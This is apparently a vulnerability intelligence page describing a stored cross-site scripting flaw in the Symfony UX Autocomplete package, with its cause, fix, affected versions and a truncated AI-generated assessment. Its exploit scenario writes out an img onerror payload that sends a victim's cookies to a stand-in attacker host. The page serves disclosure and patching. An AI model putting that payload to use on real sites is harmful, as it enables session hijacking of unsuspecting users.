Symfony UX Autocomplete CVE-2026-49216
MEDIUMSeverity by source
Stored XSS requiring low-privilege write access to populate the data source (PR:L); victim must trigger the dropdown (UI:R); scope changes to the victim's browser (S:C).
Estimated by vuln.today — no official severity rating has been published for this CVE yet.
Lifecycle Timeline
2DescriptionCVE.org
Description
The Stimulus controller shipped with symfony/ux-autocomplete renders AJAX response items into the dropdown by interpolating the text field directly into HTML template literals (<div>${item[labelField]}</div>) inside _createAutocompleteWithRemoteData(). The value is parsed as HTML rather than text, so any markup contained in the AJAX response is executed by the browser.
When the dropdown values are derived from user-supplied content, an attacker can craft a string that triggers stored XSS in the browser of any other user who later opens a page containing an autocomplete widget backed by the same data.
Resolution
The option and item renderers used in _createAutocompleteWithRemoteData() now use TomSelect's escape helper to HTML-escape the value by default. Endpoints that legitimately return HTML (for example, to highlight the search term) can opt back in to the previous behavior by setting options_as_html: true. The AutocompleteChoiceTypeExtension normalizer that previously forced options_as_html=false when autocomplete_url was set has been dropped so the opt-in is reachable from the form layer.
The patch for this issue is available here for branch 2.x (and forward-ported to 3.x).
Credits
Symfony would like to thank Alex Ashkov for reporting the issue and Hugo Alliaume for providing the fix.
AnalysisAI
Stored cross-site scripting in symfony/ux-autocomplete allows an attacker who can write user-controlled data to an AJAX autocomplete endpoint to execute arbitrary JavaScript in the browser of any user who subsequently loads a page containing an affected autocomplete widget. The Stimulus controller's _createAutocompleteWithRemoteData() function interpolates the text field from AJAX responses directly into HTML template literals without sanitization, causing the browser to parse and execute embedded markup. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires two concurrent conditions: (1) the application uses `symfony/ux-autocomplete` with an AJAX-powered autocomplete widget configured via `autocomplete_url`, activating the vulnerable `_createAutocompleteWithRemoteData()` code path; and (2) the AJAX endpoint returns data derived from user-controlled input that has not been independently HTML-sanitized before storage. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | No official CVSS score has been assigned by NVD or Symfony at time of analysis, so severity must be inferred from the vulnerability class and context. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker registers an account or submits a form on an application that uses an AJAX-backed Symfony UX Autocomplete widget, entering a display name such as `<img src=x onerror="document.location='https://attacker.example/steal?c='+document.cookie">`. The malicious value is stored in the application's database and subsequently returned via the AJAX autocomplete endpoint. … |
| Remediation | Upgrade symfony/ux-autocomplete to version 2.36.0 (for 2.x installations) or 3.1.0 (for 3.x installations) as confirmed by the vendor advisory at https://github.com/symfony/ux/security/advisories/GHSA-mwqm-4fw3-cjvr; the underlying fix is available at commit https://github.com/symfony/ux/commit/842ae54bc74de389299f975f01aafae272cb0019. … Detailed patch versions, workarounds, and compensating controls in full report. |
Threat intelligence, references, and detailed analysis are available after sign-in.
Same weakness CWE-79 – Cross-site Scripting (XSS)
View allShare
External POC / Exploit Code
Leaving vuln.today